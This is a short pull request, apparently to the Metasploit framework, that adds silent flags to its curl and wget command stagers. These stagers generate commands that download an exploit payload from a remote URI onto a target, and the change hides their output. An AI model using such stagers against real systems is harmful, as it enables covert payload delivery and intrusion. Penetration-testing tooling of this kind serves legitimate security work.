### PR TITLE
Silence wget and curl CmdStagers

### DIFF
--- a/lib/rex/exploitation/cmdstager/curl.rb
+++ b/lib/rex/exploitation/cmdstager/curl.rb
@@ -22,9 +22,9 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
     cmds = []
 
     if opts[:ssl]
-      cmds << "curl -ko #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
     else
-      cmds << "curl -o #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
     end
 
     cmds

--- a/lib/rex/exploitation/cmdstager/wget.rb
+++ b/lib/rex/exploitation/cmdstager/wget.rb
@@ -23,9 +23,9 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
     ncc  = '--no-check-certificate'
 
     if opts[:ssl]
-      cmds << "wget -O #{@payload_path} #{ncc} #{opts[:payload_uri]}"
+      cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
     else
-      cmds << "wget -O #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
     end
 
     cmds


### PR DESCRIPTION
Not absolutely necessary but nice to have in case `stdout` or `stderr` go somewhere we don't want. I usually do this for manual testing, such as when `curl` is sent through a pipe.